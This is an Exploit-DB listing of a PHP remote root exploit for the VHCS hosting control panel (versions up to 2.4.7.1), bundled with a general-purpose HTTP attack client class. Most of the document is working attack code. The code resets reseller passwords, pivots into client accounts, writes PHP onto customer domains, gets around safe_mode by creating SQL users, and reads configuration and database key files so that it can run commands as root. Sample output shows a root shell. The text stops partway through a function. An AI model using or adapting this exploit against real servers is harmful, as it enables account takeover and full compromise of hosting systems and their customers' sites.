VHCS <= 2.4.7.1 vhcs2_daemon Remote Root Exploit

2008-03-09T00:00:00
ID EDB-ID:5224
Type exploitdb
Reporter DarkFig
Modified 2008-03-09T00:00:00

Description

VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit. Remote exploit for linux platform

                                        
                                            #!/usr/bin/php -q
&lt;?php
error_reporting(E_ALL ^ E_NOTICE);
#
#
# darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/
#
#  VHCS &lt;= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
#  --------------------------------------------------
# 
# About:
#  by DarkFig &lt; gmdarkfig (at) gmail (dot) com &gt;
#  http://acid-root.new.fr/
#  #acidroot@irc.worldnet.net
# 
# Exploit:
#  + Logged in (Administrator)
#  + The administrator has 2 resellers
#  / Changing dareseller's password
#  / Trying to connect as dareseller:thatpwnz
#  + Login successful
#  + The reseller has 2 users
#  + Host domaintest.fr is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host domaintest.fr isn't a valid user
#  + Host xpliamaclient.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host xpliamaclient.com isn't a valid user
#  / Changing unautresel's password
#  / Trying to connect as unautresel:thatpwnz
#  + Login successful
#  + The reseller has 1 users
#  + Host thegoodone.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  / Trying to create a database
#  + Database 92xpl_db39 successfully created
#  + Using database id 12
#  / Trying to add SQL user
#  + User 93xpl_usr2 successfully created
#  + Using SQL user id 17
#  + Host thegoodone.com is a valid user
#  + Logged in (thegoodone.com - Client)
#  / Trying to load files via local_infile
#  + Ok: /etc/vhcs2/vhcs2.conf
#  + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
#  + Now you can execute commands as root =]
#  + root@thegoodone.com: id
# 
# uid=0(root) gid=0(root)
#

##############################################
# THE VHCS CODE IS AFTER THE PHPSPLOIT CLASS
##############################################


/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 4 / PHP 5
 * VERSION:        2.0
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 *
 * [2007-06-10] (2.0)
 *  * Code: Code optimization
 *  * New: Compatible with PHP 4 by default
 *
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */

class phpsploit
{
	var $proxyhost;
	var $proxyport;
	var $host;
	var $path;
	var $port;
	var $method;
	var $url;
	var $packet;
	var $proxyuser;
	var $proxypass;
	var $header;
	var $cookie;
	var $data;
	var $boundary;
	var $allowredirection;
	var $last_redirection;
	var $cookiejar;
	var $recv;
	var $cookie_str;
	var $header_str;
	var $server_content;
	var $server_header;
	

	/**
	 * This function is called by the
	 * get()/post()/formdata() functions.
	 * You don't have to call it, this is
	 * the main function.
	 *
	 * @access private
	 * @return string $this-&gt;recv ServerResponse
	 * 
	 */
	function sock()
	{
		if(!empty($this-&gt;proxyhost) && !empty($this-&gt;proxyport))
		   $socket = @fsockopen($this-&gt;proxyhost,$this-&gt;proxyport);
		else
		   $socket = @fsockopen($this-&gt;host,$this-&gt;port);
		
		if(!$socket)
		   die("Error: Host seems down");
		
		if($this-&gt;method=='get')
		   $this-&gt;packet = 'GET '.$this-&gt;url." HTTP/1.1\r\n";
		   
		elseif($this-&gt;method=='post' or $this-&gt;method=='formdata')
		   $this-&gt;packet = 'POST '.$this-&gt;url." HTTP/1.1\r\n";
		   
		else
		   die("Error: Invalid method");
		
		if(!empty($this-&gt;proxyuser))
		   $this-&gt;packet .= 'Proxy-Authorization: Basic '.base64_encode($this-&gt;proxyuser.':'.$this-&gt;proxypass)."\r\n";
		
		if(!empty($this-&gt;header))
		   $this-&gt;packet .= $this-&gt;showheader();
		   
		if(!empty($this-&gt;cookie))
		   $this-&gt;packet .= 'Cookie: '.$this-&gt;showcookie()."\r\n";
	
		$this-&gt;packet .= 'Host: '.$this-&gt;host."\r\n";
		$this-&gt;packet .= "Connection: Close\r\n";
		
		if($this-&gt;method=='post')
		{
			$this-&gt;packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
			$this-&gt;packet .= 'Content-Length: '.strlen($this-&gt;data)."\r\n\r\n";
			$this-&gt;packet .= $this-&gt;data."\r\n";
		}
		elseif($this-&gt;method=='formdata')
		{
			$this-&gt;packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this-&gt;boundary."\r\n";
			$this-&gt;packet .= 'Content-Length: '.strlen($this-&gt;data)."\r\n\r\n";
			$this-&gt;packet .= $this-&gt;data;
		}

		$this-&gt;packet .= "\r\n";
		$this-&gt;recv = '';

		fputs($socket,$this-&gt;packet);

		while(!feof($socket))
		   $this-&gt;recv .= fgets($socket);

		fclose($socket);

		if($this-&gt;cookiejar)
		   $this-&gt;getcookie();

		if($this-&gt;allowredirection)
		   return $this-&gt;getredirection();
		else
		   return $this-&gt;recv;
	}
	

	/**
	 * This function allows you to add several
	 * cookies in the request.
	 * 
	 * @access  public
	 * @param   string cookn CookieName
	 * @param   string cookv CookieValue
	 * @example $this-&gt;addcookie('name','value')
	 * 
	 */
	function addcookie($cookn,$cookv)
	{
		if(!isset($this-&gt;cookie))
		   $this-&gt;cookie = array();

		$this-&gt;cookie[$cookn] = $cookv;
	}


	/**
	 * This function allows you to add several
	 * headers in the request.
	 *
	 * @access  public
	 * @param   string headern HeaderName
	 * @param   string headervalue Headervalue
	 * @example $this-&gt;addheader('Client-IP', '128.5.2.3')
	 * 
	 */
	function addheader($headern,$headervalue)
	{
		if(!isset($this-&gt;header))
		   $this-&gt;header = array();
		   
		$this-&gt;header[$headern] = $headervalue;
	}


	/**
	 * This function allows you to use an
	 * http proxy server. Several methods
	 * are supported.
	 * 
	 * @access  public
	 * @param   string proxy ProxyHost
	 * @param   integer proxyp ProxyPort
	 * @example $this-&gt;proxy('localhost',8118)
	 * @example $this-&gt;proxy('localhost:8118')
	 * 
	 */
	function proxy($proxy,$proxyp='')
	{
		if(empty($proxyp))
		{
			$proxarr = explode(':',$proxy);
			$this-&gt;proxyhost = $proxarr[0];
			$this-&gt;proxyport = (int)$proxarr[1];
		}
		else 
		{
			$this-&gt;proxyhost = $proxy;
			$this-&gt;proxyport = (int)$proxyp;
		}

		if($this-&gt;proxyport &gt; 65535)
		   die("Error: Invalid port number");
	}
	

	/**
	 * This function allows you to use an
	 * http proxy server which requires a
	 * basic authentification. Several
	 * methods are supported:
	 *
	 * @access  public
	 * @param   string proxyauth ProxyUser
	 * @param   string proxypass ProxyPass
	 * @example $this-&gt;proxyauth('user','pwd')
	 * @example $this-&gt;proxyauth('user:pwd');
	 * 
	 */
	function proxyauth($proxyauth,$proxypass='')
	{
		if(empty($proxypass))
		{
			$posvirg = strpos($proxyauth,':');
			$this-&gt;proxyuser = substr($proxyauth,0,$posvirg);
			$this-&gt;proxypass = substr($proxyauth,$posvirg+1);
		}
		else
		{
			$this-&gt;proxyuser = $proxyauth;
			$this-&gt;proxypass = $proxypass;
		}
	}


	/**
	 * This function allows you to set
	 * the 'User-Agent' header.
	 * 
	 * @access  public
	 * @param   string useragent Agent
	 * @example $this-&gt;agent('Firefox')
	 * 
	 */
	function agent($useragent)
	{
		$this-&gt;addheader('User-Agent',$useragent);
	}

	
	/**
	 * This function returns the headers
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;header_str Headers
	 * @example $this-&gt;showheader()
	 * 
	 */
	function showheader()
	{
		$this-&gt;header_str = '';
		
		if(!isset($this-&gt;header))
		   return;
		   
		foreach($this-&gt;header as $name =&gt; $value)
		   $this-&gt;header_str .= $name.': '.$value."\r\n";
		   
		return $this-&gt;header_str;
	}

	
	/**
	 * This function returns the cookies
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;cookie_str Cookies
	 * @example $this-&gt;showcookie()
	 * 
	 */
	function showcookie()
	{
		$this-&gt;cookie_str = '';
		
		if(!isset($this-&gt;cookie))
		   return;
		
		foreach($this-&gt;cookie as $name =&gt; $value)
		   $this-&gt;cookie_str .= $name.'='.$value.'; ';

		return $this-&gt;cookie_str;
	}


	/**
	 * This function returns the last
	 * formed http request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;packet HttpPacket
	 * @example $this-&gt;showlastrequest()
	 * 
	 */
	function showlastrequest()
	{
		if(!isset($this-&gt;packet))
		   return;
		else
		   return $this-&gt;packet;
	}


	/**
	 * This function sends the formed
	 * http packet with the GET method.
	 * 
	 * @access  public
	 * @param   string url Url
	 * @return  string $this-&gt;sock()
	 * @example $this-&gt;get('localhost/index.php?var=x')
	 * @example $this-&gt;get('http://localhost:88/tst.php')
	 * 
	 */
	function get($url)
	{
		$this-&gt;target($url);
		$this-&gt;method = 'get';
		return $this-&gt;sock();
	}

	
	/**
	 * This function sends the formed
	 * http packet with the POST method.
	 *
	 * @access  public
	 * @param   string url  Url
	 * @param   string data PostData
	 * @return  string $this-&gt;sock()
	 * @example $this-&gt;post('http://localhost/','helo=x')
	 * 
	 */	
	function post($url,$data)
	{
		$this-&gt;target($url);
		$this-&gt;method = 'post';
		$this-&gt;data = $data;
		return $this-&gt;sock();
	}
	

	/**
	 * This function sends the formed http
	 * packet with the POST method using
	 * the multipart/form-data enctype.
	 * 
	 * @access  public
	 * @param   array array FormDataArray
	 * @return  string $this-&gt;sock()
	 * @example $formdata = array(
	 *                      frmdt_url =&gt; 'http://localhost/upload.php',
	 *                      frmdt_boundary =&gt; '123456', # Optional
	 *                      'var' =&gt; 'example',
	 *                      'file' =&gt; array(
	 *                                frmdt_type =&gt; 'image/gif',  # Optional
	 *                                frmdt_transfert =&gt; 'binary' # Optional
	 *                                frmdt_filename =&gt; 'hello.php,
	 *                                frmdt_content =&gt; '&lt;?php echo 1; ?&gt;'));
	 *          $this-&gt;formdata($formdata);
	 * 
	 */
	function formdata($array)
	{
		$this-&gt;target($array[frmdt_url]);
		$this-&gt;method = 'formdata';
		$this-&gt;data = '';
		
		if(!isset($array[frmdt_boundary]))
		   $this-&gt;boundary = 'phpsploit';
		else
		   $this-&gt;boundary = $array[frmdt_boundary];

		foreach($array as $key =&gt; $value)
		{
			if(!preg_match('#^frmdt_(boundary|url)#',$key))
			{
				$this-&gt;data .= str_repeat('-',29).$this-&gt;boundary."\r\n";
				$this-&gt;data .= 'Content-Disposition: form-data; name="'.$key.'";';
				
				if(!is_array($value))
				{
					$this-&gt;data .= "\r\n\r\n".$value."\r\n";
				}
				else
				{
					$this-&gt;data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";

					if(isset($array[$key][frmdt_type]))
					   $this-&gt;data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";

					if(isset($array[$key][frmdt_transfert]))
					   $this-&gt;data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

					$this-&gt;data .= "\r\n".$array[$key][frmdt_content]."\r\n";
				}
			}
		}

		$this-&gt;data .= str_repeat('-',29).$this-&gt;boundary."--\r\n";
		return $this-&gt;sock();
	}

	
	/**
	 * This function returns the content
	 * of the server response, without
	 * the headers.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this-&gt;server_content
	 * @example $this-&gt;getcontent()
	 * @example $this-&gt;getcontent($this-&gt;get('http://localhost/'))
	 * 
	 */
	function getcontent($code='')
	{
		if(empty($code))
		   $code = $this-&gt;recv;

		$code = explode("\r\n\r\n",$code);
		$this-&gt;server_content = '';
		
		for($i=1;$i&lt;count($code);$i++)
		   $this-&gt;server_content .= $code[$i];

		return $this-&gt;server_content;
	}

	
	/**
	 * This function returns the headers
	 * of the server response, without
	 * the content.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this-&gt;server_header
	 * @example $this-&gt;getcontent()
	 * @example $this-&gt;getcontent($this-&gt;post('http://localhost/','1=2'))
	 * 
	 */
	function getheader($code='')
	{
		if(empty($code))
		   $code = $this-&gt;recv;

		$code = explode("\r\n\r\n",$code);
		$this-&gt;server_header = $code[0];
		
		return $this-&gt;server_header;
	}

	
	/**
	 * This function is called by the
	 * cookiejar() function. It adds the
	 * value of the "Set-Cookie" header
	 * in the "Cookie" header for the
	 * next request. You don't have to
	 * call it.
	 * 
	 * @access private
	 * @param  string code ServerResponse
	 * 
	 */
	function getcookie()
	{
		foreach(explode("\r\n",$this-&gt;getheader()) as $header)
		{
			if(preg_match('/set-cookie/i',$header))
			{
				$fequal = strpos($header,'=');
				$fvirgu = strpos($header,';');
				
				// 12=strlen('set-cookie: ')
				$cname  = substr($header,12,$fequal-12);
				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
				
				$this-&gt;cookie[trim($cname)] = trim($cvalu);
			}
		}
	}


	/**
	 * This function is called by the
	 * get()/post() functions. You
	 * don't have to call it.
	 *
	 * @access  private
	 * @param   string urltarg Url
	 * @example $this-&gt;target('http://localhost/')
	 * 
	 */
	function target($urltarg)
	{
		if(!ereg('^http://',$urltarg))
		   $urltarg = 'http://'.$urltarg;
		   
		$urlarr     = parse_url($urltarg);
		$this-&gt;url  = 'http://'.$urlarr['host'].$urlarr['path'];
		
		if(isset($urlarr['query']))
		   $this-&gt;url .= '?'.$urlarr['query'];
		
		$this-&gt;port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
		$this-&gt;host = $urlarr['host'];
		
		if($this-&gt;port != '80')
		   $this-&gt;host .= ':'.$this-&gt;port;

		if(!isset($urlarr['path']) or empty($urlarr['path']))
		   die("Error: No path precised");

		$this-&gt;path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);

		if($this-&gt;port &gt; 65535)
		   die("Error: Invalid port number");
	}
	
	
	/**
	 * If you call this function,
	 * the script will extract all
	 * 'Set-Cookie' headers values
	 * and it will automatically add
	 * them into the 'Cookie' header
	 * for all next requests.
	 *
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this-&gt;cookiejar(0)
	 * @example $this-&gt;cookiejar(1)
	 * 
	 */
	function cookiejar($code)
	{
		if($code=='0')
		   $this-&gt;cookiejar=FALSE;

		elseif($code=='1')
		   $this-&gt;cookiejar=TRUE;
	}


	/**
	 * If you call this function,
	 * the script will follow all
	 * redirections sent by the server.
	 * 
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this-&gt;allowredirection(0)
	 * @example $this-&gt;allowredirection(1)
	 * 
	 */
	function allowredirection($code)
	{
		if($code=='0')
		   $this-&gt;allowredirection=FALSE;
		   
		elseif($code=='1')
		   $this-&gt;allowredirection=TRUE;
	}

	
	/**
	 * This function is called if
	 * allowredirection() is enabled.
	 * You don't have to call it.
	 *
	 * @access private
	 * @return string $this-&gt;get('http://'.$this-&gt;host.$this-&gt;path.$this-&gt;last_redirection)
	 * @return string $this-&gt;get($this-&gt;last_redirection)
	 * @return string $this-&gt;recv;
	 * 
	 */
	function getredirection()
	{
		if(preg_match('/(location|content-location|uri): (.*)/i',$this-&gt;getheader(),$codearr))
		{
			$this-&gt;last_redirection = trim($codearr[2]);
			
			if(!ereg('://',$this-&gt;last_redirection))
			   return $this-&gt;get('http://'.$this-&gt;host.$this-&gt;path.$this-&gt;last_redirection);

			else
			   return $this-&gt;get($this-&gt;last_redirection);
		}
		else
		   return $this-&gt;recv;
	}


	/**
	 * This function allows you
	 * to reset some parameters.
	 * 
	 * @access  public
	 * @param   string func Param
	 * @example $this-&gt;reset('header')
	 * @example $this-&gt;reset('cookie')
	 * @example $this-&gt;reset()
	 * 
	 */
	function reset($func='')
	{
		switch($func)
		{
			case 'header':
			$this-&gt;header = array('');
			break;
				
			case 'cookie':
			$this-&gt;cookie = array('');
			break;
				
			default:
			$this-&gt;cookiejar = '';
			$this-&gt;header = array('');
			$this-&gt;cookie = array('');
			$this-&gt;allowredirection = '';
			break;
		}
	}
}


class vhcs_xpl extends phpsploit
{
	var $sleep_time = 4;

	#  -rw-r--r-- 1 root root
	var $conf_path = '/etc/vhcs2/vhcs2.conf';

	# -r-------- 1 www-data www-data
	var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';

	var $head_arr = array(
            'admin/index.php'       =&gt; 3,
	    'reseller/index.php'    =&gt; 2,
	    '../reseller/index.php' =&gt; 2,
	    'client/index.php'      =&gt; 1,
	    ''	                    =&gt; 0);

	var $privileges = array(
	    3 =&gt; 'Administrator',
	    2 =&gt; 'Reseller',
	    1 =&gt; 'Client');

	var $reg_arr = array(
            1 =&gt; '#edit_reseller\.php\?edit_id=([0-9]+)" class="link"&gt;(.*) &lt;/a&gt; &lt;/td&gt;#i',
	    2 =&gt; '#edit_user.php\?edit_id=([0-9]+)" class="link"&gt;(.*)&lt;/a&gt;&lt;/td&gt;#i',
	    3 =&gt; '#delete_sql_database\.php\?id=([0-9]+)#i',
	    4 =&gt; '#delete_sql_database\.php\?id=([0-9]+)#i',
	    5 =&gt; '#sql_execute_query.php\?id=([0-9]+)#i');

	var $flags = array(
	   -1 =&gt; '-',
	    0 =&gt; '/',
	    1 =&gt; '+');

	function main()
	{
		$this-&gt;agent('Mozilla Firefox');
		$this-&gt;cookiejar(1);

		$this-&gt;mhead();

		$this-&gt;uri      = $this-&gt;getparam('url', TRUE);
		$this-&gt;url_arr  = parse_url($this-&gt;uri);

		$this-&gt;patch = $this-&gt;getparam('patch');
		$this-&gt;proxh = $this-&gt;getparam('proxhost');
		$this-&gt;proxa = $this-&gt;getparam('proxauth');

		if($this-&gt;proxh)
		   $this-&gt;proxy($this-&gt;proxh);

		if($this-&gt;proxa)
		   $this-&gt;proxyauth($this-&gt;proxa);

		print "\nExploit:";
		$this-&gt;type = $this-&gt;login();

		if(empty($this-&gt;type))
		{
			if(!$this-&gt;patch)
			{
				$this-&gt;msg('A patch has been applied to this website', -1);
				$this-&gt;msg("See RoMaNSoFt's advisory for more details", -1);
				$this-&gt;msg('Try with the -patch option', -1, 1);
			}
			else
			   $this-&gt;msg('Bad username/password', -1, 1);
		}

		$this-&gt;msg("Logged in (".$this-&gt;usr.' - '.$this-&gt;privileges[$this-&gt;type].')', 1);

		$this-&gt;allowredirection(1);

		$this-&gt;get_vhcs_conf();

		$this-&gt;exec_cmd();

		return;
	}


	function getparam($param, $nec=FALSE)
	{
		global $argv;

		foreach($argv as $value =&gt; $key)
		{
			if($key === '-'.$param)
			   return $argv[$value+1];
		}

		if($nec)
		   $this-&gt;usage();
		
		return FALSE;
	}

	function mhead()
	{
		print "\n VHCS &lt;= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit";
		print "\n --------------------------------------------------\n";
		print "\nAbout:";
		print "\n by DarkFig &lt; gmdarkfig (at) gmail (dot) com &gt;";
		print "\n http://acid-root.new.fr/";
		print "\n #acidroot@irc.worldnet.net";
		print "\n";
	
		return;
	}
	
	function usage()
	{
		print "\nUsage:";
		print "\n vhcsxpl.php -url &lt;url&gt; [options...]\n";
		print "\nOptions:";
		print "\n -patch &lt;user:pwd&gt;     Unofficial patch applied";
		print "\n -proxhost &lt;ip&gt;        If you wanna use a proxy";
		print "\n -proxauth &lt;usr:pwd&gt;   Proxy with authentication\n";
		print "\n";
	
		exit(1);
	}

	function log_as()
	{
		$this-&gt;msg("Trying to connect as ".$this-&gt;usr.':'.$this-&gt;pwd, 0);
		$this-&gt;allowredirection(1);

		$this-&gt;post($this-&gt;uri.'chk_login.php',
		'uname='.$this-&gt;usr.'&upass='.$this-&gt;pwd.'&Submit=+++Login+++');

		$this-&gt;redir_type = $this-&gt;get_type_by_redir();

		if($this-&gt;redir_type == 0)
		   $this-&gt;msg('Login attempt failed', -1);

		else
		   $this-&gt;msg('Login successful', 1);

		return $this-&gt;redir_type;
	}

	function get_type_by_redir()
	{
		$this-&gt;redir_arr = parse_url($this-&gt;last_redirection);
			
		$this-&gt;allowredirection(0);

		return $this-&gt;head_arr[$this-&gt;redir_arr['path']];
	}
	
	function login()
	{
		if($this-&gt;patch)
		{
			$this-&gt;idents = explode(':', $this-&gt;patch);
			list($this-&gt;usr, $this-&gt;pwd) =	$this-&gt;idents;

			$this-&gt;type = $this-&gt;log_as();

			return $this-&gt;log_as_user();
		}
		else
		{
			$this-&gt;get($this-&gt;uri.'admin/manage_users.php');

			$this-&gt;type = 3;

			if(ereg('add_user\.php', $this-&gt;getcontent()))
			   return $this-&gt;log_as_user();

			else
			   return 0;
		}
	}

	function log_as_user()
	{
		if($this-&gt;type == 3)
		   $this-&gt;logged_as_admin();

		if($this-&gt;type == 2)
		   $this-&gt;logged_as_reseller();

		if($this-&gt;type == 1)
		{
			if(!$this-&gt;patch)
			   return 1;

			else
			   return $this-&gt;valid_user();
		}

		else
		   return 0;
	}

	function valid_user()
	{
		if($this-&gt;write_code())
		{
			# open_basedir + safe_mode
			if($this-&gt;is_safe())
			{
				if($this-&gt;bypass_with_db())
				   return 1;

				else
				   return 0;
			}
			else
			   return 1;
		}
		return 0;		
	}

	function logged_as_admin()
	{
		$this-&gt;msg('Logged in ('.$this-&gt;privileges[3].')', 1);

		$this-&gt;get($this-&gt;uri.'admin/manage_users.php');

		preg_match_all($this-&gt;reg_arr[1], $this-&gt;getcontent(), $resellers);

		$this-&gt;reseller_count = count($resellers[1]);

		$this-&gt;msg('The administrator has '.$this-&gt;reseller_count.' resellers', 1);

		for($i=0; $i&lt;$this-&gt;reseller_count; $i++)
		{	
			$this-&gt;usr = $resellers[2][$i];
			$this-&gt;pwd = 'thatpwnz';

			if(!$this-&gt;patch)
		   	{
				$this-&gt;msg('Changing '.$resellers[2][$i]."'s password", 0);

				$this-&gt;reseller_dat = '';

				$this-&gt;get($this-&gt;uri.'admin/edit_reseller.php?edit_id='.$resellers[1][$i]);

				# only checked ip
				preg_match_all('#name="ip_([0-9]+)" value="asgned" checked#i',
				$this-&gt;getcontent(), $reseller_ips);

				$this-&gt;ip_count = count($reseller_ips[1]);
				$this-&gt;ip_dat = '';

				for($j=0; $j&lt;$this-&gt;ip_count; $j++)
				{
					$this-&gt;ip_dat .= 'ip_'.$reseller_ips[1][$j].'=asgned';

		   	 		if($j != $this-&gt;ip_count-1)
		  	    		   $this-&gt;ip_dat .= '&';
				}

				# Change reseller's password/mail
				# This is needed if it was run without -path
				# Because we can't click on the 'Change' button.
				#
				# pwd: thatpwnz
				# mail: &lt;reseller_name&gt;@ohyeah.com
				#
				$this-&gt;post($this-&gt;uri.'admin/edit_reseller.php',
				'username='.$resellers[2][$i].'&pass=thatpwnz&'.
				'pass_rep=thatpwnz&email='.$resellers[2][$i].''.
				'%40ohyeah.com&nreseller_max_domain_cnt=0&nres'.
				'eller_max_subdomain_cnt=0&nreseller_max_alias'.
				'_cnt=0&nreseller_max_mail_cnt=0&nreseller_max'.
				'_ftp_cnt=0&nreseller_max_sql_db_cnt=0&nresell'.
				'er_max_sql_user_cnt=0&nreseller_max_traffic=0'.
				'&nreseller_max_disk=0&'.$this-&gt;ip_dat.'&custo'.
				'mer_id=&fname=&lname=&firm=&zip=&city=&countr'.
				'y=&street1=&street2=&phone=&fax=&Submit=++Upd'.
				'ate++&uaction=update_reseller&edit_id='.
				$resellers[1][$i].'&edit_username='.
				$resellers[2][$i]);

				if($this-&gt;log_as() != 2)
				   return 0;
			}
			else
			{
				$this-&gt;allowredirection(1);

				$this-&gt;get($this-&gt;uri.'admin/change_user_interface.php?to_id='.$resellers[1][$i]);

				if($this-&gt;get_type_by_redir() != 2)
				   return 0;
			}

			if($this-&gt;logged_as_reseller())
			   return 1;

			$this-&gt;reset('cookie');
			$this-&gt;get($this-&gt;uri.'reseller/change_user_interface.php?action=go_back');
		}

		return 0;
	}

	function logged_as_reseller()
	{
		$this-&gt;get($this-&gt;uri.'reseller/users.php');

		preg_match_all($this-&gt;reg_arr[2], $this-&gt;getcontent(), $users);
		
		array_walk($users[2], 'trim');
		
		$this-&gt;user_count = count($users[1]);
		
		$this-&gt;msg('The reseller has '.$this-&gt;user_count. ' users', 1);

		$this-&gt;patch = FALSE;

		for($i=0; $i&lt;$this-&gt;user_count; $i++)
		{
			if($this-&gt;is_alive($users[2][$i]))
			{
				$this-&gt;usr = $users[2][$i];

				$this-&gt;type = 1;

				$this-&gt;msg('Host '.$this-&gt;usr.' is connected', 1);

				$this-&gt;get($this-&gt;uri.'reseller/change_user_interface.php?to_id='.$users[1][$i]);

				if($this-&gt;valid_user())
				{
					$this-&gt;msg('Host '.$this-&gt;usr.' is a valid user', 1);
					return TRUE;
				}
				else
				   $this-&gt;msg("Host ".$this-&gt;usr." isn't a valid user", 0);
			}
			else
			   $this-&gt;msg('Host '.$users[2][$i].' seems down', -1);

			$this-&gt;get($this-&gt;uri.'client/change_user_interface.php?action=go_back');
		}

		return FALSE;
	}

	function bypass_with_db()
	{
		$this-&gt;get($this-&gt;dmn_vhcs_url.'client/index.php');

		if(!ereg('manage_sql.php', $this-&gt;getcontent()) and !$edit)
		{
			$this-&gt;msg("User ".$this-&gt;ur." doesn't have SQL rights", -1);

			return FALSE;
		}
		
		# No database
		if(!$this-&gt;got_db())
		{
			$this-&gt;msg('Trying to create a database', 0);

			$this-&gt;tmp_db_name = rand(0,100).'xpl_db'.rand(0,100);

			# Database: ..xpl_db..
			$this-&gt;post($this-&gt;dmn_vhcs_url.'client/add_sql_database.php',
			'db_name='.$this-&gt;tmp_db_name.'&id_pos=start&Submit=++Add++&'.
			'uaction=add_db');

			if($this-&gt;got_db())
			   $this-&gt;msg('Database '.$this-&gt;tmp_db_name.' successfully created', 1);

			else
			{
				$this-&gt;msg("Can't create the database ".$this-&gt;tmp_db_name, 0);

				return FALSE;
			}
		}

		# First database
		$this-&gt;db_id = $this-&gt;sql_db_ids[1];

		$this-&gt;msg('Using database id '.$this-&gt;db_id, 1);

		if(!$this-&gt;got_db_user())
		{
			$this-&gt;msg('Trying to add SQL user', 0);

			$this-&gt;tmp_db_user = rand(0,100).'xpl_usr'.rand(0,100);
			
			# SQL user: ..xpl_usr..:xpl_pwd
			$this-&gt;post($this-&gt;dmn_vhcs_url.'client/sql_add_user.php',
			'user_name='.$this-&gt;tmp_db_user.'&id_pos=end&pass=xpl_pw'.
			'd&pass_rep=xpl_pwd&Add_New=++Add++&uaction=add_user&id='.
			$this-&gt;db_id);

			if($this-&gt;got_db_user())
			   $this-&gt;msg('User '.$this-&gt;tmp_db_user.' successfully created', 1);

			else
			{
				$this-&gt;msg("Can't create the SQL user ".$this-&gt;tmp_db_user, 0);

				return FALSE;
			}
		}

		# First SQL user id associed with the database
		$this-&gt;db_user_id = $this-&gt;sql_usrs[1];

		$this-&gt;msg('Using SQL user id '.$this-&gt;db_user_id, 1);

		return TRUE;
	}

	function got_db_user()
	{		
		$this-&gt;get($this-&gt;dmn_vhcs_url.'client/manage_sql.php');

		$this-&gt;content_arr = explode("\n", $this-&gt;getcontent());

		$this-&gt;is_sql_db_usr = FALSE;

		for($i=0; $i&lt;count($this-&gt;content_arr); $i++)
		{
			if(preg_match($this-&gt;reg_arr[4],
			$this-&gt;content_arr[$i], $this-&gt;sql_db_id))
			{
				if($this-&gt;sql_db_id[1] == $this-&gt;db_id)
				   $this-&gt;is_sql_db_usr = TRUE;

				else
				   $this-&gt;is_sql_db_usr = FALSE;
			}

			if(preg_match($this-&gt;reg_arr[5],
			$this-&gt;content_arr[$i], $this-&gt;sql_usrs))
			{
				if($this-&gt;is_sql_db_usr)
				   return TRUE;
			}
		}
		return FALSE;
	}

	function got_db()
	{	
		$this-&gt;get($this-&gt;dmn_vhcs_url.'client/manage_sql.php');

		preg_match($this-&gt;reg_arr[3],
		$this-&gt;getcontent(), $this-&gt;sql_db_ids);

		if(empty($this-&gt;sql_db_ids))
		   return FALSE;

		else
		   return TRUE;
	}

	function is_alive($domain_name)
	{
		if(gethostbyname($domain_name) != $domain_name)
		   return TRUE;

		else
		   return FALSE;
	}

	function write_code()
	{
		$this-&gt;msg('Trying to write PHP code', 0);

		$this-&gt;dmn_url      = 'http://'.$this-&gt;usr;
		$this-&gt;dmn_vhcs_url = $this-&gt;dmn_url.$this-&gt;url_arr['path'];

